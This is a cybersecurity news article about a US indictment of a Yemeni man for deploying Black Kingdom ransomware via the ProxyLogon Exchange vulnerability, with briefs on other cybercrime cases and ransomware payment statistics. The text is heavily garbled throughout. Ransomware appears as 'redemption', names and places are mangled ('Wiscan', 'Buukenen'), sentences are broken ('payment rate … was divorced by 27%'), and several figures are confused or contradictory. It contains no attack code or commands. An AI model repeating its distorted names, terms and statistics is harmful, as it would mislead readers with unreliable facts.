The US Department of Justice (DOJ) announced on Thursday an allegation of a 36-year-old national Yemen for allegedly deploying Black Kingdom ransom against global goals, including enterprises, schools and hospitals in the US.
Rami Khaled Ahmed from Sana, Yemen, was charged with one conspiracy, one of their intentional damage to the protective computer and one of the data on the threat of damage to the secure computer. Ahmed is currently being rated in Yemen.
“From March 2021 to June 2023, Ahmed and other infected computer networks of several victims in the US, including a medical company for billing services to Enchina, a ski resort in Oregon, a school district in Pennsylvania, and a Wiscan Health Clinic,” Doo – Note In a statement.
Ahmed is charged with developing and deploying ransoms using a vulnerability on the Microsoft Exchange server known as Proxylogon.
Redemption worked either by encrypting data from the victim’s computer networks or claims to steal this information on the networks. After encryption, the redemption in the system reduced the recovery note and sent the victim to send Bitcoin worth $ 10,000 to the cryptocurrency, which is controlled by the co -author.
The victims were also allegedly asked to send evidence to the Black King’s email address. It is estimated that the ransom program was set about 1500 computer systems in the US and other places.
Also tracked under the name Pydomer, the ransomware family had previously been associated with the attacks using the vulnerabilities of Pulse Secure VPN (Cve-2019-11510), Microsoft disclosed At the end of March 2021, noting that this is the first existing ransom family, which took advantage of proxylogon’s shortcomings.
Sophos supplier Sophos described The Black Kingdom as “somewhat rudimentary and amateur in their composition” when the attackers use proxylogon vulnerability to deploy web -rollers, which were then used to issue PowerShell commands to download ransom.
It also states that the activity carries all the signs of the “motivated scenario-kiddie”. Then later in August was a Nigerian actor threatening observe Trying to recruit employees by offering them to pay $ 1 million to Bitcoin to deploy Black Kingdom Ransomware on companies networks as part of the insiders threat.
When convicted, Ahmed threatens the maximum term in a five -year federal prison for each count. The case is being investigated by the US Federal Bureau (FBI) with the help of New Zealand police.
The charges arise against the background
- Doj accomplished The accusation accused by Ukrainian citizen Artem Styzak of attacking companies using using Non -phylim Redemption has since become a branch in June 2021. He was arrested in Spain in June 2024 and extradited to the US on April 30, 2025. When convicted of charges, he faces up to five years in prison.
- Tyler Robert Buukenen, British national, suspected of being a member extradited From Spain to the United States to accusations related to legal fraud and exacerbation of theft. Buukenon was arrested In Spain in June 2024, there were accusations against him and other scattered spider members announced US in November 2024.
- Leonidas Voragianis (Aka War), 21, and Posan Nepal (aka Trip), 20 years, two allegedly the leaders of the child’s extortion were 764. arrested and accused with director and distribution of sexual abuse of children (CSAM). Both men are accused of using at least eight minor victims.
- Richard Anthony Rhine Dansmor, another 764 member was convict Up to 30 years in the US in November 2024 for the sexual exploitation of the child. Members 764 g ComA scattered collection of poorly related groups that commit financially motivated, sexual and severe crimes. It also includes a scattered spider.
- US Financial Crimes Network (FINCEN) (FINCEN) appointed Conglomerate based on Cambodia Group Huione As “Institute of Primary Laundering of money concern “for transnational cyber -cuzine gangs of Southeast Asia Romantic baits scam And it serves as a critical knot to laundering from cyber -jews conducted by the Democratic People’s Republic of Korea (DPRK). The Huione Pay Bank License was canceled In March 2025, the National Bank of Cambodia.
The extortion attacks increase when payments are reduced
Buildings come as Ransom continued be a permanent threatAlthough increasingly fragile and volatile, as stable law enforcement action causes serious shifts in the observed tactics. This includes an increasing frequency of attacks without encryption and tendencies of cybercriminals that depart from traditional hierarchical groups for the benefit of a lone wolf approach.
“Redemption operations are becoming more decentralized, and an increasing number of former branches are choosing independently rather than staying related to installed groups,” Halcyon – Note.
“This shift is due to several factors, including the strengthening of law enforcement coordination, successful large -scale ransom infrastructure, and more broadly actors to avoid attribution through the rotation of the brand or unoccupied companies.”
The data compiled by Verizon shows that 44% of all analyzed violations in 2024 involved the use of redemption deformation, compared to 32% in 2023. But there are good news: more casualties than if -do not refuse to pay ransom, and fewer organizations are ready to pay the costs.
“In the calendar year 2024, the average payment is $ 115,000, which decreases compared to $ 150,000 last year,” Verizon – Note In its report on the 2025 data violation (DBIR). “64% of the victims’ organizations did not pay ransom, which increased compared to 50% two years ago.”
According to Coveware, the average payment for the first quarter of 2025 was $ 552,777, which is 0.2% compared to the previous quarter. On the contrary, the media has risen by $ 80 to $ 200,000.
“The speed of companies that decided to pay the ransom, either to purchase keys decryptions, or to suppress the actor threatening from placement of impaired data at the leak site, slightly increased in Q1 2025”, – the company – – Note.
The ransom payment rate during this period was divorced by 27%, compared to 85% in 1 quarter 2019, 73% in Q1 2020, 56% in Q1 2021, 46% in Q1 2022, 45% in Q1 2023 and 28% in Q1 2024.
“While the attacks are certainly still happening, and new groups continue to promote every month, a well-oiled ransom car, built by early RAAS groups, suffer from complications that seem to be solved,” he added.
Despite these setbacks, the compelling programs do not indicate a sign of termination soon, and Q1 2025 is observed 2289 registered incidents, which is 126% compared to Q1 2024, Per Check the point. However attacks on ransom was a witness In March 2025, 32% fell a month, a total of 600 claimed incidents.
North America and Europe made up more than 80% of cases. Products and services of national consumption, business services, industrial production, health care and construction and engineering were the sectors that are most focused on redemption.
“The volume of ransom incidents reach unprecedented levels”, Dr. Darren Williams, founder and CEO Blackfog, – Note. “This is a constant problem for organizations engaged in attackers, focused on violations, theft and extortion. Different groups will appear and blossom, but all of them focus on one ultimate goal, expressive data.”
